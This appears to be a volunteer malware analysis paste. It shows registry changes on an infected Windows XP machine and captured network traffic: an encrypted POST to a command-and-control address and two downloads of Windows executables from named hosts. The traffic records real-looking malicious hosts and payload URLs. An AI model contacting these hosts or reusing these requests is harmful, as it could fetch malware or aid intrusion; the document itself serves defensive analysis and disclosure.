- HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed: 20 96 FE 0B A2 D7 98 9E C7 C0 44 9D 8F 5B 02 79 62 CE 07 0C 38 C7 E1 A7 C3 61 66 55 B8 D2 89 FB 8C AA 14 30 8F C4 BA 33 00 08 05 78 1F 55 8D 14 8F 02 4F 97 D4 75 FF AA CA 99 B1 97 E8 8C 9B 21 79 3E D3 02 C1 54 C3 8C FE 6C 35 6F C0 C8 03 C6
- HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesProcessed: 0x00000015
- HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesProcessed: 0x0000002B
- HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesSuccessful: 0x00000008
- HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesSuccessful: 0x0000000C
- HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\Count: 0x00000000
- HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\Count: 0x00000001
- HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\NextInstance: 0x00000000
- HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\NextInstance: 0x00000001
- HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Epoch\Epoch: 0x00000027
- HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Epoch\Epoch: 0x0000002A
- HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\Count: 0x00000000
- HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\Count: 0x00000001
- HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\NextInstance: 0x00000000
- HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\NextInstance: 0x00000001
- HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch\Epoch: 0x00000027
- HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch\Epoch: 0x0000002A
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Identities\Identity Ordinal: 0x00000001
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Identities\Identity Ordinal: 0x00000002
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Recent File List\File1: "C:\Documents and Settings\rik\デスクトップ\001.bmp"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Recent File List\File1: "C:\Documents and Settings\rik\デスクトップ\002.bmp"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU\MRUList: "a"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU\MRUList: "ab"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*\MRUList: "a"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*\MRUList: "cba"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\bmp\MRUList: "a"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\bmp\MRUList: "ba"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\MRUListEx: 00 00 00 00 FF FF FF FF
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\MRUListEx: 01 00 00 00 00 00 00 00 FF FF FF FF
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.bmp\MRUListEx: 00 00 00 00 FF FF FF FF
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.bmp\MRUListEx: 01 00 00 00 00 00 00 00 FF FF FF FF
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG: 01 00 00 00 15 00 00 00 30 58 95 5D 1D AC CD 01
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG: 01 00 00 00 19 00 00 00 D0 F5 A2 C6 1D AC CD 01
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU: 01 00 00 00 2F 00 00 00 20 13 9A 5D 1D AC CD 01
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU: 01 00 00 00 35 00 00 00 60 65 CB C6 1D AC CD 01
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:ペイント.yax: 01 00 00 00 06 00 00 00 B0 96 90 4F 1C AC CD 01
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:ペイント.yax: 01 00 00 00 07 00 00 00 D0 F5 A2 C6 1D AC CD 01
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\JVAQBJF\flfgrz32\zfcnvag.rkr: 01 00 00 00 06 00 00 00 40 E8 BD 4F 1C AC CD 01
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\JVAQBJF\flfgrz32\zfcnvag.rkr: 01 00 00 00 07 00 00 00 60 65 CB C6 1D AC CD 01
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings: 3C 00 00 00 05 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 90 F5 57 C9 7B A4 CD 01 01 00 00 00 C0 A8 07 54 00 00 00 00 00 00 00 00
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings: 3C 00 00 00 06 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 90 F5 57 C9 7B A4 CD 01 01 00 00 00 C0 A8 07 54 00 00 00 00 00 00 00 00
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\MRUListEx: 00 00 00 00 02 00 00 00 01 00 00 00 FF FF FF FF
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\MRUListEx: 01 00 00 00 02 00 00 00 00 00 00 00 FF FF FF FF
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\SessionInformation\ProgramCount: 0x00000004
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\SessionInformation\ProgramCount: 0x00000006
- ==============================================
- EVIL NETWORK CONNECTIVITIES..............
- ==============================================
- (1)POST /forum/viewtopic.php HTTP/1.0
- Host: 108.178.59.34
- Accept: */*
- Accept-Encoding: identity, *;q=0
- Content-Length: 255
- Connection: close
- Content-Type: application/octet-stream
- Content-Encoding: binary
- User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
- CRYPTED0.....?E..+..?X.Q...M.....i....fx....F.hp.q.....2.=B
- ..*..8..EA`....sj[.....O...2.#Ic.4H..BE...s..$.i.,X.....o.U
- ..5....GCP..7=.Jt.vpq5o.+.....)u(....?.$....`...O...u.n....
- ...V.....+Y.u .{..}X?V.h..x.....*.5.Gy.(...>)..1....@.B.B..;
- =C.f..<.\......B.*HTTP/1.1 200 OK
- Server: nginx/0.7.67
- Date: Wed, 17 Oct 2012 04:17:15 GMT
- Content-Type: text/html
- Connection: close
- X-Powered-By: PHP/5.3.14-1~dotdeb.0
- -----------
- (2)GET /Z2U.exe HTTP/1.0
- Host: 3073.a.hostable.me
- Accept: */*
- Accept-Encoding: identity, *;q=0
- Connection: close
- User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
- HTTP/1.1 200 OK
- Date: Wed, 17 Oct 2012 04:13:17 GMT
- Server: Apache
- Last-Modified: Wed, 17 Oct 2012 04:10:03 GMT
- Accept-Ranges: bytes
- Content-Length: 407128
- Connection: close
- Content-Type: application/x-msdownload
- MZ......................@..........................................
- .....!..L.!This program cannot be run in DOS mode.
- $.......PE..L...
- ----------------------------------------
- (3)GET /PNV3Hbi.exe HTTP/1.0
- Host: 85.18.21.252
- Accept: */*
- Accept-Encoding: identity, *;q=0
- Connection: close
- User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
- HTTP/1.1 200 OK
- Date: Wed, 17 Oct 2012 04:09:24 GMT
- Server: Apache/2.2.22 (Debian)
- Last-Modified: Wed, 17 Oct 2012 04:06:07 GMT
- ETag: "242fca-63658-4cc3963d6a094"
- Accept-Ranges: bytes
- Content-Length: 407128
- Connection: close
- Content-Type: application/x-msdos-program
- MZ......................@...............................................!
- This program cannot be run in DOS mode.$.......PE..L....(~P..............
- .Z....................@.......................... ......................
- ......................................................................U..
- ..E..M.....E..U..E..M...A.U..E..E..M.....U..E...]...U......E..E..M..M..E.
- .E......E...]....U...E.P.M.Q.U.R.|......]........U..Q.E.."...E.."...E..".
- #MalwareMustDie!!!!!!!!!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement